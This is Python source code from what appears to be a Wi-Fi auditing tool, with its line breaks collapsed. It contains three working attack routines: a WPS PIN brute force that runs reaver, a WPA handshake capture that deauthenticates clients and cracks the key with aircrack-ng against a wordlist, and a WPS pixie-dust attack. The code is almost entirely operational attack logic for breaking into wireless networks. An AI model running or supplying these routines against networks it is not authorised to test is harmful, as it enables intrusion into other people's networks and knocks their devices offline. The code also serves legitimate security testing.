def run_wps_pin_attack(self): # Write reaver stdout to file. self.stdout_file = Configuration.temp('reaver.out') if os.path.exists(self.stdout_file): os.remove(self.stdout_file) stdout_write = open(self.stdout_file, 'a') # Start reaver process command = [ 'reaver', '-i', Configuration.interface, '-b', self.target.bssid, '-c', self.target.channel, '-a', # Automatically restart session '-vv' # verbose ] reaver = Process(command, stdout=stdout_write, stderr=Process.devnull()) self.success = False pins = set() pin_current = 0 pin_total = 11000 failures = 0 state = 'initializing' while True: time.sleep(1) percent = 100 * float(pin_current) / float(pin_total) Color.clear_line() Color.p('\r{+} {C}WPS PIN attack{W} (') Color.p('{G}%.2f%% done{W}, ' % percent) Color.p('{G}%d{W}/{G}%d pins{W}, ' % (pin_current, pin_total)) Color.p('{R}%d/%d failures{W}) ' % (failures, \ Configuration.wps_fail_threshold)) if failures >= Configuration.wps_fail_threshold: Color.pl('{R}failed: {O}too many failures{W}') break # Get output out = self.get_stdout() # Clear output file f = open(self.stdout_file, 'w') f.write('') f.close() # CHECK FOR CRACK (pin, psk, ssid) = AttackWPS.get_pin_psk_ssid(out) if pin and psk and ssid: # We cracked it. self.success = True Color.pl('\n{+} {G}successly cracked WPS PIN and PSK{W}\n') self.crack_result = CrackResultWPS(self.target.bssid, ssid, pin, psk) self.crack_result.dump() break # PIN PROGRESS # Reaver 1.5.* match = None for match in re.finditer('Pin count advanced: (\d+)\\. Max pin attempts: (\d+)', out): # Look at last entry for "Pin count advanced" to get latest pin count pass if match: # Reset failures on successful try failures = 0 groups = match.groups() pin_current = int(groups[0]) pin_total = int(groups[1]) # Reaver 1.3, 1.4 match = None for match in re.finditer('Trying pin (\d+)', out): if match: pin = int(match.groups()[0]) if pin not in pins: # Reset failures on successful try failures = 0 pins.add(pin) pin_current += 1 # Failures if 'WPS transaction failed' in out: failures += out.count('WPS transaction failed') elif 'Receive timeout occurred' in out: # Reaver 1.4 failures += out.count('Receive timeout occurred') # Status if 'Waiting for beacon from' in out: state = '{O}waiting for beacon{W}' if 'Starting Cracking Session' in out: state = '{C}cracking{W}' # Reaver 1.4 if 'Trying pin' in out and 'cracking' not in state: state = '{C}cracking{W}' if 'Detected AP rate limiting' in out: state = '{R}rate-limited{W}' if Configuration.wps_skip_rate_limit: Color.pl(state) Color.pl('{!} {R}hit rate limit, stopping{W}\n') Color.pl('{!} {O}use {R}--skip-rate-limit{O} to ignore' + ' this kind of failure in the future{W}') break if 'WARNING: Failed to associate with' in out: # TODO: Fail after X association failures (instead of just one) Color.pl('\n{!} {R}failed to associate with target, {O}stopping{W}') break match = re.search('Estimated Remaining time: ([a-zA-Z0-9]+)', out) if match: eta = match.groups()[0] state = '{C}cracking, ETA: {G}%s{W}' % eta match = re.search('Max time remaining at this rate: ([a-zA-Z0-9:]+)..([0-9]+) pins left to try', out) if match: eta = match.groups()[0] state = '{C}cracking, ETA: {G}%s{W}' % eta pins_left = int(match.groups()[1]) # Divine pin_current & pin_total from this: pin_current = 11000 - pins_left # Check if process is still running if reaver.pid.poll() != None: Color.pl('{R}failed{W}') Color.pl('{!} {R}reaver{O} quit unexpectedly{W}') self.success = False break # Output the current state Color.p(state) ''' [+] Waiting for beacon from AA:BB:CC:DD:EE:FF [+] Associated with AA:BB:CC:DD:EE:FF (ESSID: <essid here>) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Pin count advanced: 46. Max pin attempts: 11000 [!] WPS transaction failed (code: 0x02), re-trying last pin [!] WPS transaction failed (code: 0x03), re-trying last pin [!] WARNING: Failed to associate with 00:24:7B:AB:5C:EE (ESSID: myqwest0445) [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking [!] WARNING: 25 successive start failures [!] WARNING: Failed to associate with B2:B2:DC:A1:35:94 (ESSID: CenturyLink2217) [+] 0.55% complete. Elapsed time: 0d0h2m21s. [+] Estimated Remaining time: 0d15h11m35s [+] Pin cracked in 7 seconds [+] WPS PIN: '12345678' [+] WPA PSK: 'abcdefgh' [+] AP SSID: 'Test Router' Reaver 1.4: [+] Max time remaining at this rate: 18:19:36 (10996 pins left to try) [!] WARNING: Receive timeout occurred ''' reaver.interrupt() return self.success
def run(self): ''' Initiates full WPA hanshake capture attack. ''' # Check if user only wants to run PixieDust attack if Configuration.pixie_only and self.target.wps: Color.pl('{!} {O}--pixie{R} set, ignoring WPA-handshake attack') self.success = False return self.success # First, start Airodump process with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, skip_wash=True, output_file_prefix='wpa') as airodump: Color.clear_line() Color.p('\r{+} {C}WPA-handshake attack{W}: ') Color.p('{O}waiting{W} for target to appear...') airodump_target = self.wait_for_target(airodump) # Get client station MAC addresses clients = [c.station for c in airodump_target.clients] client_index = 0 handshake = None time_since_deauth = time.time() deauth_proc = None while True: if not deauth_proc or deauth_proc.poll() != None: # Clear line only if we're not deauthing right now Color.p('\r%s\r' % (' ' * 90)) Color.p('\r{+} {C}WPA-handshake attack{W}: ') Color.p('waiting for {C}handshake{W}...') time.sleep(1) # Find .cap file cap_files = airodump.find_files(endswith='.cap') if len(cap_files) == 0: # No cap files yet continue cap_file = cap_files[0] # Copy .cap file to temp for consistency temp_file = Configuration.temp('handshake.cap.bak') copy(cap_file, temp_file) # Check cap file in temp for Handshake bssid = airodump_target.bssid essid = None if airodump_target.essid_known: essid = airodump_target.essid handshake = Handshake(temp_file, bssid=bssid, essid=essid) if handshake.has_handshake(): # We got a handshake Color.pl('\n\n{+} {G}successfully captured handshake{W}') break # There is no handshake handshake = None # Delete copied .cap file in temp to save space os.remove(temp_file) # Check status of deauth process if deauth_proc and deauth_proc.poll() == None: # Deauth process is still running time_since_deauth = time.time() # Look for new clients airodump_target = self.wait_for_target(airodump) for client in airodump_target.clients: if client.station not in clients: Color.pl('\r{+} discovered {G}client{W}:' + ' {C}%s{W}%s' % (client.station, ' ' * 10)) clients.append(client.station) # Send deauth to a client or broadcast if time.time( ) - time_since_deauth > Configuration.wpa_deauth_timeout: # We are N seconds since last deauth was sent, # And the deauth process is not running. if len(clients) == 0 or client_index >= len(clients): deauth_proc = self.deauth(bssid) client_index = 0 else: client = clients[client_index] deauth_proc = self.deauth(bssid, client) client_index += 1 time_since_deauth = time.time() continue # Stop the deauth process if needed if deauth_proc and deauth_proc.poll() == None: deauth_proc.interrupt() if not handshake: # No handshake, attack failed. self.success = False return self.success key = None # Save copy of handshake to ./hs/ self.save_handshake(handshake) # Print analysis of handshake file Color.pl('\n{+} analysis of captured handshake file:') handshake.analyze() # Crack handshake wordlist = Configuration.wordlist if wordlist != None: wordlist_name = wordlist.split(os.sep)[-1] if not os.path.exists(wordlist): Color.pl('{!} {R}unable to crack:' + ' wordlist {O}%s{R} does not exist{W}' % wordlist) else: # We have a wordlist we can use Color.p('\n{+} {C}cracking handshake{W}' + ' using {C}aircrack-ng{W}' + ' with {C}%s{W} wordlist' % wordlist_name) # TODO: More-verbose cracking status # 1. Read number of lines in 'wordlist' # 2. Pipe aircrack stdout to file # 3. Read from file every second, get keys tried so far # 4. Display # of keys tried / total keys, and ETA key_file = Configuration.temp('wpakey.txt') command = [ 'aircrack-ng', '-a', '2', '-w', wordlist, '-l', key_file, handshake.capfile ] aircrack = Process(command, devnull=True) aircrack.wait() if os.path.exists(key_file): # We cracked it. Color.pl('\n\n{+} {G}successfully cracked PSK{W}\n') f = open(key_file, 'r') key = f.read() f.close() else: Color.pl('\n{!} {R}handshake crack failed:' + ' {O}%s did not contain password{W}' % wordlist.split(os.sep)[-1]) self.crack_result = CrackResultWPA(bssid, essid, handshake.capfile, key) self.crack_result.dump() self.success = True return self.success
def run_pixiedust_attack(self): # Write reaver stdout to file. self.stdout_file = Configuration.temp('reaver.out') if os.path.exists(self.stdout_file): os.remove(self.stdout_file) command = [ 'reaver', '-i', Configuration.interface, '-b', self.target.bssid, '-c', self.target.channel, '-K', '1', # pixie-dust attack '-a', # Automatically restart session '-vv' # (very) verbose ] stdout_write = open(self.stdout_file, 'a') reaver = Process(command, stdout=stdout_write, stderr=Process.devnull()) pin = None step = '0) initializing' while True: time.sleep(1) Color.clear_line() Color.p('\r{+} {C}WPS pixie-dust attack{W} ') stdout_write.flush() # Check output from reaver process stdout = self.get_stdout() stdout_last_line = stdout.split('\n')[-1] (pin, psk, ssid) = self.get_pin_psk_ssid(stdout) # Check if we cracked it, or if process stopped. if (pin and psk and ssid) or reaver.poll() != None: reaver.interrupt() # Check one-last-time for PIN/PSK/SSID, in case of race condition. stdout = self.get_stdout() (pin, psk, ssid) = AttackWPS.get_pin_psk_ssid(stdout) # Check if we cracked it. if pin and psk and ssid: # We cracked it. bssid = self.target.bssid Color.pl( '\n\n{+} {G}successfully cracked WPS PIN and PSK{W}\n') self.crack_result = CrackResultWPS(bssid, ssid, pin, psk) self.crack_result.dump() return True else: # Failed to crack, reaver proces ended. Color.pl('{R}failed: {O}WPS pin not found{W}') return False # Status updates, depending on last line of stdout if 'Waiting for beacon from' in stdout_last_line: step = '({C}step 1/8{W}) waiting for beacon' elif 'Associated with' in stdout_last_line: step = '({C}step 2/8{W}) waiting to start session' elif 'Starting Cracking Session.' in stdout_last_line: step = '({C}step 3/8{W}) waiting to try pin' elif 'Trying pin' in stdout_last_line: step = '({C}step 4/8{W}) trying pin' elif 'Sending EAPOL START request' in stdout_last_line: step = '({C}step 5/8{W}) sending eapol start request' elif 'Sending identity response' in stdout_last_line: step = '({C}step 6/8{W}) sending identity response' elif 'Sending M2 message' in stdout_last_line: step = '({C}step 7/8{W}) sending m2 message (may take a while)' elif 'Detected AP rate limiting,' in stdout_last_line: if Configuration.wps_skip_rate_limit: Color.pl('{R}failed: {O}hit WPS rate-limit{W}') # TODO: Argument for --ignore-rate-limit ''' Color.pl('{!} {O}use {R}--ignore-rate-limit{O} to ignore' + ' this kind of failure in the future') ''' break step = '({C}step -/8{W}) waiting for AP rate limit' if 'WPS pin not found' in stdout: Color.pl('{R}failed: {O}WPS pin not found{W}') break # TODO: Timeout check if reaver.running_time() > Configuration.wps_pixie_timeout: Color.pl('{R}failed: {O}timeout after %d seconds{W}' % Configuration.wps_timeout) break # Reaver Failure/Timeout check fail_count = stdout.count('WPS transaction failed') if fail_count > Configuration.wps_fail_threshold: Color.pl('{R}failed: {O}too many failures (%d){W}' % fail_count) break timeout_count = stdout.count('Receive timeout occurred') if timeout_count > Configuration.wps_timeout_threshold: Color.pl('{R}failed: {O}too many timeouts (%d){W}' % timeout_count) break # Display status of Pixie-Dust attack Color.p('{W}%s{W}' % step) continue # Attack failed, already printed reason why reaver.interrupt() stdout_write.close() return False